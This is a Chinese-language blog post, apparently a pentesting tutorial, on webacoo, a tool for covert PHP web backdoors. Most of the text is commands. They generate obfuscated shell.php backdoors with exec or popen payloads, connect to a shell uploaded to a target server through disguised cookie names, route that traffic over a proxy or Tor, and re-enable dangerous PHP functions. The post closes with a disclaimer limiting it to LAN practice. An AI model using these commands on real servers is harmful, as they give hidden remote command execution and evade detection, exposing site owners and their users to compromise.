• 欢迎访问本站网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

一款隐蔽的php脚本类web后门工具webacoo

网络安全 admin 3个月前 (10-18) 89次浏览 已收录 0个评论 扫描二维码

使用默认配置生成模糊的后门代码

  1. webacoo -g -o shell.php

一款隐蔽的php脚本类web后门工具webacoo
使用exec有效载荷混淆后门代码

  1. webacoo -g -o shell_1.php -f 3

一款隐蔽的php脚本类web后门工具webacoo
使用popen有效载荷生成原始后门

  1. webacoo -g -o shell_2.php -f 5 -r

一款隐蔽的php脚本类web后门工具webacoo
使用终端模式连接后门
1,默认参数 -u 访问服务器

一款隐蔽的php脚本类web后门工具webacoo
2,将Test-cookie 作为cookie名称,TtT作为分隔符,访问服务器

  1. webacoo -t -u http://192.168.106.131/template/upload/shell.php -c “Test-cookie” -d “TtT”

3,将Test-cookie2 作为cookie 名称,TtT作为分隔符,使用代理服务器10.0.1.5:8081访问服务器

  1. webacoo -t -u http://192.168.106.131/template/upload/shell.php -c “Test-cookie2” -d “TtT” -p 10.0.1.5:8081

4,将My-cookie 作为cookie名称,使用tor代理网络访问后门

  1. webacoo -t -uhttp://192.168.106.131/template/upload/shell.php -c “My-cookie” -p tor

使用技巧
1,在Windows环境下需要php程序支持相应的函数,可以在php.ini文件中设置disable_functions,取消禁用函数exec,system,passthru,shell_exec,示例如下
disable_functions=escapeshellarg,escapeshellcmd,proc_close,proc_open,dll,popen,show_source
通过https代理支持,配合Burp Site等工具实现。
webacoo -t -u http://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
webacoo -t -u https://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
2,在非ubantu环境下,需要liburi-perl,libio-socket-socks-perl组件的支持

在局域网环境进行,切勿用于非法用途
声明:
切勿使用在本网站学习的方法计算机,保护网络安全,人人有责,做一个维护网络安全的人。
该网站编写此类文章的目标是为了让渗透测试爱好者在学习过程中更好的掌握技巧和方法同时也让广大网民了解黑客是如何对互联网进行攻击的从而更好的保护网络财产安全,如果使用在本站学习的方法和技巧攻击其他计算机的造成的后果自负,与本站无关,学技术不是为了搞破坏,而是为了更好祖国的网络全!


本站的文章和资源来自互联网或者站长的原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:一款隐蔽的php脚本类web后门工具webacoo
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址